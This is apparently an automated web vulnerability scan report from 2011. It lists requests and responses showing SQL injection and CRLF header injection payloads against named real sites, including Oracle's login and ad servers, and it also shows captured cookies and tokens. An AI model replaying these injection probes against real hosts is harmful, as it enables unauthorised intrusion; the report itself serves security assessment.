GET /r.cgi?1'=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:36 GMT Content-Type: text/html Connection: close Content-Length: 575
<html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]...
Request 2
GET /r.cgi?1''=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:56 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-25'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:03 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-7'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14496
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
2. HTTP header injectionpreviousnext There are 9 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
The value of REST URL parameter 1 is copied into the Location response header. The payload 2de58%0d%0a6d24920450 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2de58%0d%0a6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F679707%2F0%2F225%2FAdId%3D1200168%3BBnId%3D3%3Bitime%3D828708808%3Bkvpg%3Dwinamp%2Fskin%2Fslick-redux%2F222084%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93166279%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828708808? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 62182%0d%0a5ce3b6d291b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62182%0d%0a5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F851061%2F0%2F225%2FAdId%3D1312688%3BBnId%3D3%3Bitime%3D828694819%3Bkvpg%3Dwinamp%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93302596%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828694819? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 51ad3%0d%0aeafac43fb55 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=51ad3%0d%0aeafac43fb55; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g
The value of the Site2pstoreToken request parameter is copied into the Location response header. The payload 21d1d%0d%0adea71b54e71 was submitted in the Site2pstoreToken parameter. This caused a response containing an injected HTTP header.
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D.21d1d%0d%0adea71b54e71 HTTP/1.1 Host: login.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;
<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8 ...[SNIP]...
The value of the N cookie is copied into the Set-Cookie response header. The payload bf012%0d%0af7b9b665bf was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302bf012%0d%0af7b9b665bf; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:35:33 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:50:33 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:35:33 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378933; path=/; expires=Sun, 06-Mar-11 02:35:33 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298774133^1298775933|18288^1298774133^1298775933; path=/; expires=Sun, 27-Feb-11 03:05:33 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302bf012 f7b9b665bf,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=.at.atwola.com ntCoent-Length: 176 Content-Type: application/x-javascript Content-Length: 176
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190'; ANRTXR();
The value of the si request parameter is copied into the Set-Cookie response header. The payload 8ecf0%0d%0a6420ebe94a was submitted in the si parameter. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:33:28 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:48:28 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:33:28 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378808; path=/; expires=Sun, 06-Mar-11 02:33:28 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298774008^1298775808|8ecf0 6420ebe94a^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=.at.atwola.com Cteonnt-Length: 176 Content-Type: application/x-javascript Content-Length: 176
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190'; ANRTXR();
2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225394
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f335d%0d%0a6c92f1d82cf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7URjBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQArR4Vqg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydqIxSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJARI7RpEyNMGMhQENq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAS1pZFg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Location: http://f335d 6c92f1d82cf=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225400
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2f2f5%0d%0a3a2cc9ab32b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:08 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdzaw8DAqJfyVjeXQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsAG6pFWY%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1p7%2FX7bcZWBg1Et5q5sLEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWQoCW3awQgTBjIUhDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAg7Jacg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/ Location: http://2f2f5 3a2cc9ab32b=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1226041
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bdae%0d%0a32111a498f8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
